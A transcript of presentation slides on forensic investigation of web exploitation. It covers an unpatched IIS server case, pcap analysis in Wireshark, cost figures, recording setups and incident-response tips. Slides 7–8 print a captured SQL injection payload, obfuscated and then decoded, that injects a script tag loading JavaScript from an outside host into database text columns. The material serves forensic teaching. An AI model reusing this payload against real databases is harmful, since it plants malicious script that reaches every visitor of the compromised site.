Presentation on theme: "Forensic Investigations of Web Exploitations"— Presentation transcript:
1 Forensic Investigations of Web Exploitations Ondrej Krehel, CISSP, CEH, Lifars LLC
2 What do I do - Digital Firefighters New cyber jobsWhat do I do - Digital Firefighters
3 Case from cyber field Scenario: Web server in the DMZ zone Inbound is filtered, however outbound is notServer is running un-patched version of IISIncident occurred ?!? - need to confirm it and if yes, incident response and investigationRecorded traffic file is available – pcap format, however we don’t have any logs, neither from firewall or web serverWe want to what happened and if we can find traces of commands as well as malwareWireshark analysis will be presented
4 Incident by Breach – All time DatalossDB.orgIncident by Breach – All time
6 The first published study CostThe first published study2011 Second Annual Cost of Cyber Crime Study by the Ponemon InstituteAn average web-based attack costs $143, 209; malicious code, $124,083; and malicious insiders, $100,300Web-borne attacks, malicious code and insiders are the most costly, making up more than 90% of all cybercrime costs per organization per year
7 GET /home/site_content_3.asp HTTP GET – RFC 2616GET /home/site_content_3.aspD B D003D B C D003D D0 02B B B E006E D B D B B E006E D B D003D D F006E C B E006E D B B C D A002F002F C E006E F E006A E003C002F E B F006D F002E F A C F002E F006C D006E C F002E E D E E E D E E D E E E006E D D B D003D D B D003D E D002C E B C D C B D003D D B D B0
8 CAST obfuscated data, after decoding: HTTP GET DecodedCAST obfuscated data, after decoding:trim(convert(varchar,'+b.name+'))+''<script src="http://yl18.net/0.js"></script>'';' from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype='U'and b.xtype=c.xtype and c.name='varchar';set 0);set
; from dbo.sysobjects a,dbo.syscolumns b,dbo.systypes c where a.id=b.id and a.xtype= U and b.xtype=c.xtype and c.name= varchar ;set @m=REVERSE(@m);set @m=substring(@m,PATINDEX( %;% ,@m),800 0);set @m=REVERSE(@m);exec(@m);",
12 Open SourceDataEcho (http://sourceforge.net/projects/data-echo/ ) EtherPeg (http://www.etherpeg.org/ ) Drifnet ( ) Good Article on How to do it in open source: forensics-appliance-howto
13 How to Record SPAN port (Switched Port Analyzer) or mirror port Can be part of SPAN local or remote VLANPhysical tape - TX and RX packetsDon't use external DNS resolutionSecure Access: use ssh and ssl, segment network
21 Tips for Businesses Incident Response Plan Establish relationships with vendors before incidentConsider subscribing to Cyber Response or Data Breach programReview current layers of protection, and network topologyIncident Response PlanCan you recognize the incident?Is evidence properly preserved?Are formalized Incident Response policies in place and tested on annual basis?Is internal staff properly trained?
22 Contacts Ondrej Krehel, CISSP, CEH, Information Security Officer Lifars, LLC
23 AbbreviationsC & C – Command and Control Channels VOIP – Voice over Internet Protocol SQL – Structured Query Language MFT- Master File Table DNS – Domain Name System P2P – Peer-to-peer networks UPX – Ultimate Packer for eXecutables CAST – Encoding and SQL function MRU – Most Recently Used section in Windows registry IDS/IPS – Intrusion Detection/Prevention Systems LKM – Loadable Kernel Module IM – Instant Messaging TCP/UPD – Common transfer protocols
Your consent to our cookies if you continue to use this website.